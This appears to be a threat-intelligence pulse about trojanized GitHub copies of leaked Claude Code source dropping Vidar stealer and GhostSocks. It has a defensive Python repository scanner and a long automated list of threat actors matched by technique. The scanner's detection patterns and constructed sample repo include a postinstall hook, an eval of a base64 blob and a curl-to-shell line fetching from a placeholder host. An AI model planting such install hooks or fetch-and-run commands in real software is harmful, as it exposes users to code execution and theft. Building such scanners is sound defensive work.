Trusted Design

Threat Actors Leverage Claude Code Leak as Social Engineering Lure to Distribute Malicious Payloads via GitHub

Summary

Cybercriminals are exploiting the recent Claude Code leak as a social engineering lure to deliver malware through GitHub repositories. The attackers publish trojanized copies of the leaked Claude source code that drop malicious payloads, including Vidar stealer version 18.7 and the GhostSocks trojan. The campaign shows how quickly a high-profile security incident is turned into an opportunistic lure, with the attacker-published repositories serving as the delivery mechanism. Organizations are advised to adopt a Zero Trust architecture to limit the risk from shadow AI instances and trojanized Claude agents. Multiple GitHub repositories have been identified hosting the malicious code, with command-and-control infrastructure spread across multiple IP addresses and domains.
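A triage check a practitioner would want here, added as an example and not taken from the original page or from the Claude Code project: a short Python scanner that walks a cloned repository and flags the places where a trojanized checkout typically gains execution, namely npm lifecycle hooks in package.json, long base64 blobs, eval of decoded data, and download-and-execute one-liners. The file names, the sample repository it builds (including the placeholder host example.invalid) and the heuristic patterns are all assumptions for illustration; none of them are indicators from this campaign.

```python
"""Heuristic triage of a cloned repository for trojanization indicators.

Added example for this pulse, not code from the original page or from the
Claude Code project. It walks a checkout and flags the patterns an attacker
typically uses to make a repository execute a payload when the victim
installs or runs it. Every hit is a triage lead, not a verdict; legitimate
projects declare postinstall scripts too. All sample content is constructed.
"""
import base64
import json
import re
import tempfile
from pathlib import Path

# npm runs these automatically on `npm install`; a hook in a cloned repo is
# the cheapest place to hide first-stage execution.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# (kind, pattern): heuristics over source text, not malware signatures.
SOURCE_PATTERNS = (
    ("long_base64_blob", re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")),
    ("eval_of_decoded_data",
     re.compile(r"\b(?:eval|new\s+Function)\s*\(\s*(?:atob|Buffer\.from)\b")),
    ("download_and_execute",
     re.compile(r"\b(?:curl|wget|iwr|Invoke-WebRequest)\b[^\n|]*\|\s*"
                r"(?:sh|bash|iex|powershell)\b", re.I)),
    ("encoded_powershell",
     re.compile(r"powershell(?:\.exe)?\s[^\n]*-(?:enc|encodedcommand)\b", re.I)),
)

# Text files worth running the heuristics over; README/docs are skipped.
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".sh", ".ps1", ".py"}


def scan_package_json(path: Path, root: Path) -> list:
    """Flag npm lifecycle hooks declared in a package.json."""
    findings = []
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (ValueError, OSError):
        return findings
    scripts = data.get("scripts", {}) if isinstance(data, dict) else {}
    for hook in LIFECYCLE_HOOKS:
        if hook in scripts:
            findings.append({"kind": "lifecycle_hook",
                             "path": path.relative_to(root).as_posix(),
                             "detail": f"{hook}: {scripts[hook]}"})
    return findings


def scan_source_file(path: Path, root: Path) -> list:
    """Run every SOURCE_PATTERNS heuristic over one text file."""
    findings = []
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return findings
    for kind, pattern in SOURCE_PATTERNS:
        m = pattern.search(text)
        if m:
            line_no = text.count("\n", 0, m.start()) + 1
            findings.append({"kind": kind,
                             "path": path.relative_to(root).as_posix(),
                             "detail": f"line {line_no}: {m.group(0)[:60]}"})
    return findings


def scan_repo(root: Path) -> list:
    """Walk a checkout (skipping .git and node_modules) and collect findings."""
    findings = []
    for path in sorted(root.rglob("*")):
        rel_parts = set(path.relative_to(root).parts)
        if not path.is_file() or rel_parts & {".git", "node_modules"}:
            continue
        if path.name == "package.json":
            findings.extend(scan_package_json(path, root))
        elif path.suffix in SCAN_SUFFIXES:
            findings.extend(scan_source_file(path, root))
    return findings


def build_sample_repo() -> Path:
    """Constructed sample checkout: one clean file plus three planted hooks."""
    root = Path(tempfile.mkdtemp(prefix="trojan-scan-"))
    (root / "src").mkdir()
    (root / "scripts").mkdir()
    (root / "src" / "index.js").write_text(
        'export function greet(name) { return `hello ${name}`; }\n')
    # postinstall hook pointing at a script that decodes and evals a blob
    (root / "package.json").write_text(json.dumps({
        "name": "sample-fork", "version": "0.0.1",
        "scripts": {"test": "node --test", "postinstall": "node scripts/setup.js"},
    }))
    blob = base64.b64encode(b"A" * 300).decode()  # 400 chars, stands in for a packed stage
    (root / "scripts" / "setup.js").write_text(
        f'const blob = "{blob}";\neval(Buffer.from(blob, "base64").toString("utf8"));\n')
    # download-and-execute one-liner with a placeholder (reserved) host
    (root / "scripts" / "bootstrap.sh").write_text(
        "#!/bin/sh\ncurl -fsSL https://example.invalid/stage2.sh | sh\n")
    return root


if __name__ == "__main__":
    for f in scan_repo(build_sample_repo()):
        print(f"[{f['kind']}] {f['path']} -> {f['detail']}")
```

Point `scan_repo(Path("path/to/clone"))` at a real checkout before running anything from it. Treat hits as leads for manual review rather than a verdict, since legitimate projects also declare postinstall hooks; and a clean scan of a repository that merely claims to be leaked source is no substitute for installing Claude Code from the vendor's own distribution channel.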

Created: 2026-05-13

Indicators

Similar Pulses

No similar pulses were found.

Threat Actors Related to This Pulse (fact-based)

Scattered Spider

Score: 43.93
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1609 - Container Administration Command
  • T1083 - File and Directory Discovery
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1087.004 - Cloud Account
  • T1556.008 - Network Provider DLL
  • T1210 - Exploitation of Remote Services
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1564.003 - Hidden Window

FIN4

Score: 5.58
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1543.003 - Windows Service

Turla

Score: 24.16
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1543.003 - Windows Service
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery
  • T1578.001 - Create Snapshot

APT32

Score: 25.19
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1592.004 - Client Configurations
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools

Saint Bear

Score: 8.12
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources

FIN6

Score: 9.73
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1063 - Security Software Discovery
  • T1055.013 - Process Doppelgänging
  • T1597 - Search Closed Sources

Sidewinder

Score: 13.51
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1159 - Launch Agent
  • T1578.001 - Create Snapshot

MuddyWater

Score: 25.16
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1518.002 - Backup Software Discovery
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1159 - Launch Agent

Earth Lusca

Score: 20.82
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1562.004 - Disable or Modify System Firewall
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1218.001 - Compiled HTML File
  • T1027.004 - Compile After Delivery

TA577

Score: 3.42
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service

Winter Vivern

Score: 17.30
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1562.004 - Disable or Modify System Firewall
  • T1055.013 - Process Doppelgänging
  • T1090 - Proxy
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File

Silence

Score: 7.12
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1547.011 - Plist Modification
  • T1562.001 - Disable or Modify Tools

Contagious Interview

Score: 34.16
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1131 - Authentication Package
  • T1021.006 - Windows Remote Management
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1690 - Prevent Command History Logging
  • T1027.004 - Compile After Delivery
  • T1656 - Impersonation

LazyScripter

Score: 6.95
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1608.005 - Link Target

TA505

Score: 19.06
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1527 - Application Access Token
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

FIN7

Score: 18.96
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1562.001 - Disable or Modify Tools
  • T1027 - Obfuscated Files or Information
  • T1578.001 - Create Snapshot

Cobalt Group

Score: 12.09
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1518.002 - Backup Software Discovery
  • T1598.004 - Spearphishing Voice

Higaisa

Score: 8.01
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1578.001 - Create Snapshot

Kimsuky

Score: 44.31
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1213.006 - Databases
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1546.011 - Application Shimming
  • T1009 - Binary Padding
  • T1131 - Authentication Package
  • T1590.006 - Network Security Appliances
  • T1609 - Container Administration Command
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1690 - Prevent Command History Logging
  • T1027.004 - Compile After Delivery
  • T1656 - Impersonation

Indrik Spider

Score: 8.63
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

Molerats

Score: 3.42
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service

Leafminer

Score: 4.50
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1051 - Shared Webroot

Mustang Panda

Score: 36.67
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1546.011 - Application Shimming
  • T1136.001 - Local Account
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1169 - Sudo
  • T1136.003 - Cloud Account
  • T1159 - Launch Agent
  • T1055.005 - Thread Local Storage

TA578

Score: 3.99
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1608.005 - Link Target

Evilnum

Score: 3.42
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1543.003 - Windows Service

Star Blizzard

Score: 9.86
Matched TTPs:
  • T1546.013 - PowerShell Profile
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1609 - Container Administration Command

GALLIUM

Score: 12.22
Matched TTPs:
  • T1584.008 - Network Devices
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1087.004 - Cloud Account

APT29

Score: 29.24
Matched TTPs:
  • T1584.008 - Network Devices
  • T1543.003 - Windows Service
  • T1202 - Indirect Command Execution
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1177 - LSASS Driver
  • T1592.004 - Client Configurations
  • T1608.005 - Link Target
  • T1556.008 - Network Provider DLL
  • T1027.004 - Compile After Delivery

FIN13

Score: 16.17
Matched TTPs:
  • T1584.008 - Network Devices
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1552.003 - Shell History
  • T1134.001 - Token Impersonation/Theft

Dragonfly

Score: 19.33
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1531 - Account Access Removal
  • T1027.004 - Compile After Delivery

Ke3chang

Score: 16.20
Matched TTPs:
  • T1584.008 - Network Devices
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1198 - SIP and Trust Provider Hijacking
  • T1090 - Proxy
  • T1087.004 - Cloud Account

Agrius

Score: 6.36
Matched TTPs:
  • T1584.008 - Network Devices
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources

APT41

Score: 19.56
Matched TTPs:
  • T1584.008 - Network Devices
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1027 - Obfuscated Files or Information
  • T1574.009 - Path Interception by Unquoted Path
  • T1564.003 - Hidden Window

menuPass

Score: 12.17
Matched TTPs:
  • T1584.008 - Network Devices
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances

Threat Group-3390

Score: 13.15
Matched TTPs:
  • T1584.008 - Network Devices
  • T1098.007 - Additional Local or Domain Groups
  • T1218.003 - CMSTP
  • T1590.006 - Network Security Appliances
  • T1574.009 - Path Interception by Unquoted Path

Wizard Spider

Score: 16.34
Matched TTPs:
  • T1584.008 - Network Devices
  • T1543.003 - Windows Service
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1083 - File and Directory Discovery
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources

Ember Bear

Score: 15.34
Matched TTPs:
  • T1584.008 - Network Devices
  • T1562.004 - Disable or Modify System Firewall
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1656 - Impersonation

Storm-0501

Score: 13.53
Matched TTPs:
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information
  • T1158 - Hidden Files and Directories

Sandworm Team

Score: 31.80
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1484.002 - Trust Modification
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1562.004 - Disable or Modify System Firewall
  • T1049 - System Network Connections Discovery
  • T1087.004 - Cloud Account
  • T1562.001 - Disable or Modify Tools
  • T1027 - Obfuscated Files or Information
  • T1075 - Pass the Hash

Sea Turtle

Score: 5.14
Matched TTPs:
  • T1063 - Security Software Discovery
  • T1098.007 - Additional Local or Domain Groups

Leviathan

Score: 15.79
Matched TTPs:
  • T1484.002 - Trust Modification
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1562.004 - Disable or Modify System Firewall
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary

Gamaredon Group

Score: 20.96
Matched TTPs:
  • T1527 - Application Access Token
  • T1098.007 - Additional Local or Domain Groups
  • T1090 - Proxy
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1554 - Compromise Host Software Binary
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools

LuminousMoth

Score: 6.86
Matched TTPs:
  • T1543.003 - Windows Service
  • T1087.004 - Cloud Account
  • T1574.009 - Path Interception by Unquoted Path

Confucius

Score: 5.43
Matched TTPs:
  • T1543.003 - Windows Service
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account

Machete

Score: 3.79
Matched TTPs:
  • T1543.003 - Windows Service
  • T1027.004 - Compile After Delivery

FIN8

Score: 3.79
Matched TTPs:
  • T1543.003 - Windows Service
  • T1027 - Obfuscated Files or Information

APT3

Score: 13.44
Matched TTPs:
  • T1543.003 - Windows Service
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1177 - LSASS Driver
  • T1051 - Shared Webroot
  • T1087.004 - Cloud Account

APT1

Score: 4.43
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances

Lazarus Group

Score: 32.81
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1547.011 - Plist Modification
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1210 - Exploitation of Remote Services
  • T1069.001 - Local Groups
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1055.005 - Thread Local Storage
  • T1578.001 - Create Snapshot

APT33

Score: 6.37
Matched TTPs:
  • T1543.003 - Windows Service
  • T1051 - Shared Webroot
  • T1562.001 - Disable or Modify Tools

ZIRCONIUM

Score: 13.35
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery
  • T1578.001 - Create Snapshot

EXOTIC LILY

Score: 6.81
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1690 - Prevent Command History Logging

Magic Hound

Score: 24.47
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1016.002 - Wi-Fi Discovery
  • T1547.005 - Security Support Provider
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1590.006 - Network Security Appliances
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027 - Obfuscated Files or Information

OilRig

Score: 15.48
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.001 - Spearphishing Attachment
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot

Windshift

Score: 4.19
Matched TTPs:
  • T1543.003 - Windows Service
  • T1159 - Launch Agent

TA2541

Score: 6.77
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources

RedCurl

Score: 13.22
Matched TTPs:
  • T1543.003 - Windows Service
  • T1016.002 - Wi-Fi Discovery
  • T1090 - Proxy
  • T1051 - Shared Webroot
  • T1027.004 - Compile After Delivery

Storm-1811

Score: 9.84
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1027 - Obfuscated Files or Information
  • T1486 - Data Encrypted for Impact

APT42

Score: 4.43
Matched TTPs:
  • T1543.003 - Windows Service
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances

APT39

Score: 14.69
Matched TTPs:
  • T1543.003 - Windows Service
  • T1566.001 - Spearphishing Attachment
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account
  • T1027.004 - Compile After Delivery

APT38

Score: 25.45
Matched TTPs:
  • T1566.001 - Spearphishing Attachment
  • T1098.007 - Additional Local or Domain Groups
  • T1503 - Credentials from Web Browsers
  • T1009 - Binary Padding
  • T1590 - Gather Victim Network Information
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information
  • T1493 - Transmitted Data Manipulation

UNC3886

Score: 21.18
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1546.011 - Application Shimming
  • T1009 - Binary Padding
  • T1021.006 - Windows Remote Management
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1578.001 - Create Snapshot

Volt Typhoon

Score: 25.25
Matched TTPs:
  • T1556.002 - Password Filter DLL
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1083 - File and Directory Discovery
  • T1049 - System Network Connections Discovery
  • T1584.002 - DNS Server
  • T1159 - Launch Agent
  • T1578.001 - Create Snapshot

Akira

Score: 11.20
Matched TTPs:
  • T1137.005 - Outlook Rules
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

APT28

Score: 15.59
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1131 - Authentication Package
  • T1562.004 - Disable or Modify System Firewall
  • T1547.011 - Plist Modification
  • T1608.005 - Link Target
  • T1574.009 - Path Interception by Unquoted Path

HEXANE

Score: 8.66
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1547.005 - Security Support Provider
  • T1590.006 - Network Security Appliances
  • T1159 - Launch Agent

IndigoZebra

Score: 3.53
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1608.005 - Link Target

RedEcho

Score: 3.92
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1562.001 - Disable or Modify Tools

Silent Librarian

Score: 4.96
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1609 - Container Administration Command

Moonstone Sleet

Score: 5.33
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1590.006 - Network Security Appliances
  • T1027 - Obfuscated Files or Information

TeamTNT

Score: 16.09
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1009 - Binary Padding
  • T1562.004 - Disable or Modify System Firewall
  • T1110.003 - Password Spraying
  • T1590.006 - Network Security Appliances
  • T1051 - Shared Webroot
  • T1597 - Search Closed Sources

CURIUM

Score: 9.70
Matched TTPs:
  • T1098.007 - Additional Local or Domain Groups
  • T1087.004 - Cloud Account
  • T1218.001 - Compiled HTML File
  • T1578.001 - Create Snapshot

Medusa Group

Score: 20.06
Matched TTPs:
  • T1218.003 - CMSTP
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1552.003 - Shell History
  • T1608.005 - Link Target
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

LAPSUS$

Score: 14.06
Matched TTPs:
  • T1547.005 - Security Support Provider
  • T1609 - Container Administration Command
  • T1556.008 - Network Provider DLL
  • T1564.003 - Hidden Window

Salt Typhoon

Score: 6.19
Matched TTPs:
  • T1009 - Binary Padding
  • T1110.003 - Password Spraying

Rocke

Score: 8.88
Matched TTPs:
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools
  • T1027.004 - Compile After Delivery

Moses Staff

Score: 3.81
Matched TTPs:
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances

Velvet Ant

Score: 6.54
Matched TTPs:
  • T1009 - Binary Padding
  • T1597 - Search Closed Sources
  • T1562.001 - Disable or Modify Tools

BlackByte

Score: 17.49
Matched TTPs:
  • T1009 - Binary Padding
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1134.001 - Token Impersonation/Theft
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

SilverTerrier

Score: 5.81
Matched TTPs:
  • T1131 - Authentication Package
  • T1552.003 - Shell History

Aquatic Panda

Score: 4.39
Matched TTPs:
  • T1562.004 - Disable or Modify System Firewall
  • T1597 - Search Closed Sources

FIN5

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1055.013 - Process Doppelgänging

Tonto Team

Score: 5.09
Matched TTPs:
  • T1547.011 - Plist Modification
  • T1027.004 - Compile After Delivery

Play

Score: 9.23
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1574.009 - Path Interception by Unquoted Path

APT19

Score: 3.81
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging

SideCopy

Score: 8.35
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1584.002 - DNS Server
  • T1159 - Launch Agent

Stealth Falcon

Score: 5.78
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1055.013 - Process Doppelgänging
  • T1087.004 - Cloud Account

Tropic Trooper

Score: 11.63
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1090 - Proxy
  • T1136.003 - Cloud Account
  • T1159 - Launch Agent

Chimera

Score: 6.03
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1087.004 - Cloud Account
  • T1578.001 - Create Snapshot

Darkhotel

Score: 4.06
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1578.001 - Create Snapshot

HAFNIUM

Score: 14.39
Matched TTPs:
  • T1590.006 - Network Security Appliances
  • T1593.003 - Code Repositories
  • T1049 - System Network Connections Discovery
  • T1608.005 - Link Target
  • T1210 - Exploitation of Remote Services

Deep Panda

Score: 3.29
Matched TTPs:
  • T1177 - LSASS Driver

Axiom

Score: 6.91
Matched TTPs:
  • T1177 - LSASS Driver
  • T1049 - System Network Connections Discovery

Fox Kitten

Score: 11.59
Matched TTPs:
  • T1177 - LSASS Driver
  • T1055.013 - Process Doppelgänging
  • T1051 - Shared Webroot
  • T1656 - Impersonation

APT37

Score: 4.68
Matched TTPs:
  • T1055.013 - Process Doppelgänging
  • T1027.004 - Compile After Delivery

Windigo

Score: 5.09
Matched TTPs:
  • T1055.013 - Process Doppelgänging
  • T1159 - Launch Agent

BRONZE BUTLER

Score: 13.32
Matched TTPs:
  • T1592.004 - Client Configurations
  • T1597 - Search Closed Sources
  • T1027.004 - Compile After Delivery
  • T1159 - Launch Agent
  • T1578.001 - Create Snapshot

INC Ransom

Score: 10.28
Matched TTPs:
  • T1083 - File and Directory Discovery
  • T1552.003 - Shell History
  • T1597 - Search Closed Sources
  • T1027 - Obfuscated Files or Information

Cinnamon Tempest

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027.004 - Compile After Delivery

Water Galura

Score: 4.86
Matched TTPs:
  • T1552.003 - Shell History
  • T1027 - Obfuscated Files or Information

APT17

Score: 5.45
Matched TTPs:
  • T1608.005 - Link Target
  • T1656 - Impersonation

DarkVishnya

Score: 6.94
Matched TTPs:
  • T1562.001 - Disable or Modify Tools
  • T1213.003 - Code Repositories

DarkHydrus

Score: 4.13
Matched TTPs:
  • T1531 - Account Access Removal

Threat Actors Related to This Pulse (inference-based)

Kimsuky

Score: 0.70
Matched TTPs:
  • T1546.011 - Application Shimming
  • T1590.006 - Network Security Appliances
  • T1552.003 - Shell History
  • T1543.003 - Windows Service
  • T1690 - Prevent Command History Logging
  • T1051 - Shared Webroot
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1131 - Authentication Package
  • T1656 - Impersonation
  • T1027.004 - Compile After Delivery
  • T1098.007 - Additional Local or Domain Groups
  • T1609 - Container Administration Command
  • T1546.013 - PowerShell Profile
  • T1009 - Binary Padding
  • T1213.006 - Databases

Scattered Spider

Score: 0.69
Matched TTPs:
  • T1027 - Obfuscated Files or Information
  • T1552.003 - Shell History
  • T1556.008 - Network Provider DLL
  • T1051 - Shared Webroot
  • T1666 - Modify Cloud Resource Hierarchy
  • T1609 - Container Administration Command
  • T1087.004 - Cloud Account
  • T1597 - Search Closed Sources
  • T1564.003 - Hidden Window
  • T1083 - File and Directory Discovery
  • T1098.007 - Additional Local or Domain Groups
  • T1685.004 - Disable or Modify Linux Audit System Log
  • T1210 - Exploitation of Remote Services
  • T1590.006 - Network Security Appliances
  • T1547.005 - Security Support Provider

Mustang Panda

Score: 0.58
Matched TTPs:
  • T1546.011 - Application Shimming
  • T1055.013 - Process Doppelgänging
  • T1590.006 - Network Security Appliances
  • T1169 - Sudo
  • T1055.005 - Thread Local Storage
  • T1543.003 - Windows Service
  • T1136.001 - Local Account
  • T1608.005 - Link Target
  • T1087.004 - Cloud Account
  • T1098.007 - Additional Local or Domain Groups
  • T1159 - Launch Agent
  • T1546.013 - PowerShell Profile
  • T1136.003 - Cloud Account

Related CVEs

No CVEs were found in this pulse.

Pulse – Threat Actor Graph

